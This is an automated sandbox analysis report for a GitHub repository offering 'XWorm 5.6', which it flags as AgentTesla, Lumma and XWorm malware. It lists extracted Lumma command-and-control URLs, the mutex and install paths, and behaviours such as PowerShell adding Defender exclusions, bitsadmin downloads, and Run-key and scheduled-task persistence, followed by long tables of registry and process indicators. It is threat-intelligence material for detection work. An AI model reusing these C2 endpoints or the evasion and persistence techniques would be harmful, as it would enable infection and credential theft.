agenttesla | hxxps://github[.]com/d00mt3l/XWorm-5[.]6

Analysis

max time kernel
692s
max time network
694s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30/08/2024, 12:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/d00mt3l/XWorm-5.6

Score

10^/10

agenttesla lumma xworm discovery dropper execution keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

lumma

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://affordcharmcropwo.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

Extracted

Family

xworm

Version

5.0

127.0.0.1:7000

Mutex

3hufOh3QEzBjZSRf

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Extracted

Family

xworm

127.0.0.1:7000

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x00080000000237d7-177.dat	family_xworm
behavioral1/files/0x00080000000237e8-187.dat	family_xworm
behavioral1/files/0x00080000000237e8-189.dat	family_xworm
behavioral1/memory/1692-191-0x00000000006B0000-0x00000000006CA000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral1/memory/4488-97-0x000001D83E4F0000-0x000001D83E6E4000-memory.dmp	family_agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1996	powershell.exe
232	powershell.exe
4852	powershell.exe
2216	powershell.exe

Download via BitsAdmin 1 TTPs 3 IoCs

dropper

BITS Jobs

T1197

pid	Process
5024	bitsadmin.exe
5052	bitsadmin.exe
3760	bitsadmin.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe

Executes dropped EXE 6 IoCs

pid	Process
1692	XClient.exe
3524	XClient.exe
5104	XClient.exe
3488	XClient.exe
3448	XClient.exe
3020	XClient.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	XClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
42	camo.githubusercontent.com
43	camo.githubusercontent.com
44	camo.githubusercontent.com
38	camo.githubusercontent.com
39	camo.githubusercontent.com
40	camo.githubusercontent.com
41	camo.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XwormLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XwormLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Xworm V5.6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Xworm V5.6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Xworm V5.6.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\TypedURLs	Xworm V5.6.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133694932990523212"	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	XClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0\0	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	Xworm V5.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0 = 84003100000000001e593a611100444f574e4c4f7e3100006c0009000400efbe025986631e593a612e00000087e101000000010000000000000000004200000000000c9f760044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0 = 6a003100000000001e590e61100058574f524d2d7e312e362d4d00004e0009000400efbe1e590e611e590e612e000000a03602000000170000000000000000000000000000007f23b900580057006f0072006d002d0035002e0036002d006d00610069006e0000001c000000	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	Xworm V5.6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 000000000200000001000000ffffffff	Xworm V5.6.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{08C6FE25-DD35-4CD9-B9D9-6AE8EC7E562B}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = 00000000ffffffff	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0\0\NodeSlot = "6"	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\MRUListEx = 00000000ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\MRUListEx = 00000000ffffffff	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0\MRUListEx = 00000000ffffffff	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0"	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000000000001000000ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\MRUListEx = 00000000ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0\0\MRUListEx = ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Xworm V5.6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Xworm V5.6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0 = 6a003100000000001e590e61100058574f524d2d7e312e362d4d00004e0009000400efbe1e590e611e590e612e000000a436020000000d0000000000000000000000000000007e144900580057006f0072006d002d0035002e0036002d006d00610069006e0000001c000000	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	Xworm V5.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	Xworm V5.6.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4556	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1692	XClient.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
2596	msedge.exe
2596	msedge.exe
2104	msedge.exe
2104	msedge.exe
4852	powershell.exe
4852	powershell.exe
2216	powershell.exe
2216	powershell.exe
1996	powershell.exe
1996	powershell.exe
232	powershell.exe
232	powershell.exe
232	powershell.exe
1692	XClient.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4488	Xworm V5.6.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: 33	8	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	8	AUDIODG.EXE
Token: SeDebugPrivilege	1692	XClient.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	3524	XClient.exe
Token: SeDebugPrivilege	5104	XClient.exe
Token: SeDebugPrivilege	3488	XClient.exe
Token: SeDebugPrivilege	3448	XClient.exe
Token: SeDebugPrivilege	3020	XClient.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
4488	Xworm V5.6.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
1692	XClient.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe
4488	Xworm V5.6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2596 wrote to memory of 4712	2596	msedge.exe	122
PID 2596 wrote to memory of 4712	2596	msedge.exe	122
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
